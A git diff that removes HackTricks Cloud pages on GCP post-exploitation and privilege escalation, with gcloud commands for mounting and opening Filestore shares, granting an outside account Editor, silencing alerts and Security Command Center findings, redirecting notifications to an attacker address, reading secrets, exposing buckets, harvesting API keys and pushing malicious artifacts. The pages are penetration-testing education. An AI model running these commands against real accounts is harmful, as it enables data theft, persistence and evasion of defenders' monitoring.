-{% endhint %} - -## Filestore - -For more information about Filestore check: - -{% content-ref url="../gcp-services/gcp-filestore-enum.md" %} -[gcp-filestore-enum.md](../gcp-services/gcp-filestore-enum.md) -{% endcontent-ref %} - -### Mount Filestore - -A shared filesystem **might contain sensitive information** interesting from an attackers perspective. With access to the Filestore it's possible to **mount it**: - -{% code overflow="wrap" %} -```bash -sudo apt-get update -sudo apt-get install nfs-common -# Check the share name -showmount -e -# Mount the share -mkdir /mnt/fs -sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs -``` -{% endcode %} - -To find the IP address of a filestore insatnce check the enumeration section of the page: - -{% content-ref url="../gcp-services/gcp-filestore-enum.md" %} -[gcp-filestore-enum.md](../gcp-services/gcp-filestore-enum.md) -{% endcontent-ref %} - -### Remove Restrictions and get extra permissions - -If the attacker isn't in an IP address with access over the share, but you have enough permissions to modify it, it's possible to remover the restrictions or access over it. It's also possible to grant more privileges over your IP address to have admin access over the share: - -```bash -gcloud filestore instances update nfstest \ - --zone= \ - --flags-file=nfs.json - -# Contents of nfs.json -{ - "--file-share": - { - "capacity": "1024", - "name": "", - "nfs-export-options": [ - { - "access-mode": "READ_WRITE", - "ip-ranges": [ - "/32" - ], - "squash-mode": "NO_ROOT_SQUASH", - "anon_uid": 1003, - "anon_gid": 1003 - } - ] - } -} -``` - -### Restore a backup - -If there is a backup it's possible to **restore it** in an existing or in a new instance so its **information becomes accessible:** - -```bash -# Create a new filestore if you don't want to modify the old one -gcloud filestore instances create \ - --zone= \ - --tier=STANDARD \ - --file-share=name=vol1,capacity=1TB \ - --network=name=default,reserved-ip-range=10.0.0.0/29 - -# Restore a backups in a new instance -gcloud filestore instances restore \ - --zone= \ - --file-share= \ - --source-backup= \ - --source-backup-region= - -# Follow the previous section commands to mount it -``` - -### Create a backup and restore it - -If you **don't have access over a share and don't want to modify it**, it's possible to **create a backup** of it and **restore** it as previously mentioned: - -{% code overflow="wrap" %} -```bash -# Create share backup -gcloud filestore backups create \ - --region= \ - --instance= \ - --instance-zone= \ - --file-share= - -# Follow the previous section commands to restore it and mount it -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md deleted file mode 100644 index 4181accdc..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md +++ /dev/null @@ -1,57 +0,0 @@ -# GCP - IAM Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## IAM - -You can find further information about IAM in: - -{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %} -[gcp-iam-and-org-policies-enum.md](../gcp-services/gcp-iam-and-org-policies-enum.md) -{% endcontent-ref %} - -### Granting access to management console - -Access to the [GCP management console](https://console.cloud.google.com) is **provided to user accounts, not service accounts**. To log in to the web interface, you can **grant access to a Google account** that you control. This can be a generic "**@gmail.com**" account, it does **not have to be a member of the target organization**. - -To **grant** the primitive role of **Owner** to a generic "@gmail.com" account, though, you'll need to **use the web console**. `gcloud` will error out if you try to grant it a permission above Editor. - -You can use the following command to **grant a user the primitive role of Editor** to your existing project: - -{% code overflow="wrap" %} -```bash -gcloud projects add-iam-policy-binding [PROJECT] --member user:[EMAIL] --role roles/editor -``` -{% endcode %} - -If you succeeded here, try **accessing the web interface** and exploring from there. - -This is the **highest level you can assign using the gcloud tool**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md deleted file mode 100644 index d1ec7ef27..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md +++ /dev/null @@ -1,146 +0,0 @@ -# GCP - Monitoring Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Monitoring - -Fore more information check: - -{% content-ref url="../gcp-services/gcp-monitoring-enum.md" %} -[gcp-monitoring-enum.md](../gcp-services/gcp-monitoring-enum.md) -{% endcontent-ref %} - -For other ways to disrupt logs check: - -{% content-ref url="gcp-logging-post-exploitation.md" %} -[gcp-logging-post-exploitation.md](gcp-logging-post-exploitation.md) -{% endcontent-ref %} - -### `monitoring.alertPolicies.delete` - -Delete an alert policy: - -```bash -gcloud alpha monitoring policies delete -``` - -### `monitoring.alertPolicies.update` - -Disrupt an alert policy: - -```bash -# Disable policy -gcloud alpha monitoring policies update --no-enabled - -# Remove all notification channels -gcloud alpha monitoring policies update --clear-notification-channels - -# Chnage notification channels -gcloud alpha monitoring policies update --set-notification-channels=ATTACKER_CONTROLLED_CHANNEL - -# Modify alert conditions -gcloud alpha monitoring policies update --policy="{ 'displayName': 'New Policy Name', 'conditions': [ ... ], 'combiner': 'AND', ... }" -# or use --policy-from-file -``` - -### `monitoring.dashboards.update` - -Modify a dashboard to disrupt it: - -```bash -# Disrupt dashboard -gcloud monitoring dashboards update --config=''' - displayName: New Dashboard with New Display Name - etag: 40d1040034db4e5a9dee931ec1b12c0d - gridLayout: - widgets: - - text: - content: Hello World - ''' -``` - -### `monitoring.dashboards.delete` - -Delete a dashboard: - -```bash -# Delete dashboard -gcloud monitoring dashboards delete -``` - -### `monitoring.snoozes.create` - -Prevent policies from generating alerts by creating a snoozer: - -{% code overflow="wrap" %} -```bash -# Stop alerts by creating a snoozer -gcloud monitoring snoozes create --display-name="Maintenance Week" \ - --criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \ - --start-time="2023-03-01T03:00:00.0-0500" \ - --end-time="2023-03-07T23:59:59.5-0500" -``` -{% endcode %} - -### `monitoring.snoozes.update` - -Update the timing of a snoozer to prevent alerts from being created when the attacker is interested: - -{% code overflow="wrap" %} -```bash -# Modify the timing of a snooze -gcloud monitoring snoozes update --start-time=START_TIME --end-time=END_TIME - -# odify everything, including affected policies -gcloud monitoring snoozes update --snooze-from-file= -``` -{% endcode %} - -### `monitoring.notificationChannels.delete` - -Delete a configured channel: - -```bash -# Delete channel -gcloud alpha monitoring channels delete -``` - -### `monitoring.notificationChannels.update` - -Update labels of a channel to disrupt it: - -{% code overflow="wrap" %} -```bash -# Delete or update labels, for example email channels have the email indicated here -gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels -gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md deleted file mode 100644 index d6be15c5f..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md +++ /dev/null @@ -1,48 +0,0 @@ -# GCP - Secretmanager Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Secretmanager - -For more information about Secret Manager check: - -{% content-ref url="../gcp-services/gcp-secrets-manager-enum.md" %} -[gcp-secrets-manager-enum.md](../gcp-services/gcp-secrets-manager-enum.md) -{% endcontent-ref %} - -### `secretmanager.versions.access` - -This give you access to read the secrets from the secret manager and maybe this could help to escalate privielegs (depending on which information is sotred inside the secret): - -```bash -# Get clear-text of version 1 of secret: "" -gcloud secrets versions access 1 --secret="" -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md deleted file mode 100644 index 745566afa..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md +++ /dev/null @@ -1,94 +0,0 @@ -# GCP - Security Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Security - -For more information check: - -{% content-ref url="../gcp-services/gcp-security-enum.md" %} -[gcp-security-enum.md](../gcp-services/gcp-security-enum.md) -{% endcontent-ref %} - -### `securitycenter.muteconfigs.create` - -Prevent generation of findings that could detect an attacker by creating a `muteconfig`: - -{% code overflow="wrap" %} -```bash -# Create Muteconfig -gcloud scc muteconfigs create my-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\"" -``` -{% endcode %} - -### `securitycenter.muteconfigs.update` - -Prevent generation of findings that could detect an attacker by updating a `muteconfig`: - -{% code overflow="wrap" %} -```bash -# Update Muteconfig -gcloud scc muteconfigs update my-test-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\"" -``` -{% endcode %} - -### `securitycenter.findings.bulkMuteUpdate` - -Mute findings based on a filer: - -{% code overflow="wrap" %} -```bash -# Mute based on a filter -gcloud scc findings bulk-mute --organization=929851756715 --filter="category=\"XSS_SCRIPTING\"" -``` -{% endcode %} - -A muted finding won't appear in the SCC dashboard and reports. - -### `securitycenter.findings.setMute` - -Mute findings based on source, findings... - -{% code overflow="wrap" %} -```bash -gcloud scc findings set-mute 789 --organization=organizations/123 --source=456 --mute=MUTED -``` -{% endcode %} - -### `securitycenter.findings.update` - -Update a finding to indicate erroneous information: - -{% code overflow="wrap" %} -```bash -gcloud scc findings update `myFinding` --organization=123456 --source=5678 --state=INACTIVE -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md deleted file mode 100644 index 8f1ee1317..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md +++ /dev/null @@ -1,60 +0,0 @@ -# GCP - Storage Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Storage - -For more information about CLoud Storage check this page: - -{% content-ref url="../gcp-services/gcp-storage-enum.md" %} -[gcp-storage-enum.md](../gcp-services/gcp-storage-enum.md) -{% endcontent-ref %} - -### Give Public Access - -It's possible to give external users (logged in GCP or not) access to buckets content. However, by default bucket will have disabled the option to expose publicly a bucket: - -```bash -# Disable public prevention -gcloud storage buckets update gs://BUCKET_NAME --no-public-access-prevention - -# Make all objects in a bucket public -gcloud storage buckets add-iam-policy-binding gs://BUCKET_NAME --member=allUsers --role=roles/storage.objectViewer -## I don't think you can make specific objects public just with IAM - -# Make a bucket or object public (via ACL) -gcloud storage buckets update gs://BUCKET_NAME --add-acl-grant=entity=AllUsers,role=READER -gcloud storage objects update gs://BUCKET_NAME/OBJECT_NAME --add-acl-grant=entity=AllUsers,role=READER -``` - -If you try to give **ACLs to a bucket with disabled ACLs** you will find this error: `ERROR: HTTPError 400: Cannot use ACL API to update bucket policy when uniform bucket-level access is enabled. Read more at https://cloud.google.com/storage/docs/uniform-bucket-level-access` - -To access open buckets via browser, access the URL `https://.storage.googleapis.com/` or `https://.storage.googleapis.com/` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md deleted file mode 100644 index af354beb0..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md +++ /dev/null @@ -1,47 +0,0 @@ -# GCP - Workflows Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Workflow - -Basic information: - -{% content-ref url="../gcp-services/gcp-workflows-enum.md" %} -[gcp-workflows-enum.md](../gcp-services/gcp-workflows-enum.md) -{% endcontent-ref %} - -### Post Exploitation - -The post exploitation techniques are actually the same ones as the ones shared in the Workflows Privesc section: - -{% content-ref url="../gcp-privilege-escalation/gcp-workflows-privesc.md" %} -[gcp-workflows-privesc.md](../gcp-privilege-escalation/gcp-workflows-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md deleted file mode 100644 index b8c3adc3a..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md +++ /dev/null @@ -1,105 +0,0 @@ -# GCP - Apikeys Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Apikeys - -The following permissions are useful to create and steal API keys, not this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._ - -Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges. - -For more information about API Keys check: - -{% content-ref url="../gcp-services/gcp-api-keys-enum.md" %} -[gcp-api-keys-enum.md](../gcp-services/gcp-api-keys-enum.md) -{% endcontent-ref %} - -For other ways to create API keys check: - -{% content-ref url="gcp-serviceusage-privesc.md" %} -[gcp-serviceusage-privesc.md](gcp-serviceusage-privesc.md) -{% endcontent-ref %} - -### Brute Force API Key access - -As you might not know which APIs are enabled in the project or the restrictions applied to the API key you found, it would be interesting to run the tool [**https://github.com/ozguralp/gmapsapiscanner**](https://github.com/ozguralp/gmapsapiscanner) and check **what you can access with the API key.** - -### `apikeys.keys.create` - -This permission allows to **create an API key**: - -```bash -gcloud services api-keys create -Operation [operations/akmf.p7-[...]9] complete. Result: { - "@type":"type.googleapis.com/google.api.apikeys.v2.Key", - "createTime":"2022-01-26T12:23:06.281029Z", - "etag":"W/\"HOhA[...]==\"", - "keyString":"AIzaSy[...]oU", - "name":"projects/5[...]6/locations/global/keys/f707[...]e8", - "uid":"f707[...]e8", - "updateTime":"2022-01-26T12:23:06.378442Z" -} -``` - -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/b-apikeys.keys.create.sh). - -{% hint style="danger" %} -Note that by default users have permissions to create new projects adn they are granted Owner role over the new project. So a user could c**reate a project and an API key inside this project**. -{% endhint %} - -### `apikeys.keys.getKeyString` , `apikeys.keys.list` - -These permissions allows **list and get all the apiKeys and get the Key**: - -```bash -for key in $(gcloud services api-keys list --uri); do - gcloud services api-keys get-key-string "$key" -done -``` - -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/c-apikeys.keys.getKeyString.sh). - -### `apikeys.keys.undelete` , `apikeys.keys.list` - -These permissions allow you to **list and regenerate deleted api keys**. The **API key is given in the output** after the **undelete** is done: - -```bash -gcloud services api-keys list --show-deleted -gcloud services api-keys undelete -``` - -### Create Internal OAuth Application to phish other workers - -Check the following page to learn how to do this, although this action belongs to the service **`clientauthconfig`** [according to the docs](https://cloud.google.com/iap/docs/programmatic-oauth-clients#before-you-begin): - -{% content-ref url="../../workspace-security/gws-google-platforms-phishing/" %} -[gws-google-platforms-phishing](../../workspace-security/gws-google-platforms-phishing/) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md deleted file mode 100644 index 9d868f485..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md +++ /dev/null @@ -1,210 +0,0 @@ -# GCP - Artifact Registry Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Artifact Registry - -For more information about Artifact Registry check: - -{% content-ref url="../gcp-services/gcp-artifact-registry-enum.md" %} -[gcp-artifact-registry-enum.md](../gcp-services/gcp-artifact-registry-enum.md) -{% endcontent-ref %} - -### artifactregistry.repositories.uploadArtifacts - -With this permission an attacker could upload new versions of the artifacts with malicious code like Docker images: - -{% code overflow="wrap" %} -```bash -# Configure docker to use gcloud to authenticate with Artifact Registry -gcloud auth configure-docker -docker.pkg.dev - -# tag the image to upload it -docker tag : -docker.pkg.dev///: - -# Upload it -docker push -docker.pkg.dev///: -``` -{% endcode %} - -{% hint style="danger" %} -It was checked that it's **possible to upload a new malicious docker** image with the same name and tag as the one already present, so the **old one will lose the tag** and next time that image with that tag is **downloaded the malicious one** will be downloaded. -{% endhint %} - -
- -Upload a Python library - -**Start by creating the library to upload** (if you can download the latest version from the registry you can avoid this step): - -1. **Set up your project structure**: - - * Create a new directory for your library, e.g., `hello_world_library`. - * Inside this directory, create another directory with your package name, e.g., `hello_world`. - * Inside your package directory, create an `__init__.py` file. This file can be empty or can contain initializations for your package. - - ```bash - mkdir hello_world_library - cd hello_world_library - mkdir hello_world - touch hello_world/__init__.py - ``` -2. **Write your library code**: - - * Inside the `hello_world` directory, create a new Python file for your module, e.g., `greet.py`. - * Write your "Hello, World!" function: - - ```python - # hello_world/greet.py - def say_hello(): - return "Hello, World!" - ``` -3. **Create a `setup.py` file**: - - * In the root of your `hello_world_library` directory, create a `setup.py` file. - * This file contains metadata about your library and tells Python how to install it. - - ```python - # setup.py - from setuptools import setup, find_packages - - setup( - name='hello_world', - version='0.1', - packages=find_packages(), - install_requires=[ - # Any dependencies your library needs - ], - ) - ``` - -**Now, lets upload the library:** - -1. **Build your package**: - - * From the root of your `hello_world_library` directory, run: - - ```sh - python3 setup.py sdist bdist_wheel - ``` -2. **Configure authentication for twine** (used to upload your package): - * Ensure you have `twine` installed (`pip install twine`). - * Use `gcloud` to configure credentials: - -{% code overflow="wrap" %} -```` -```sh -twine upload --username 'oauth2accesstoken' --password "$(gcloud auth print-access-token)" --repository-url https://-python.pkg.dev/// dist/* -``` -```` -{% endcode %} - -3. **Clean the build** - -```bash -rm -rf dist build hello_world.egg-info -``` - -
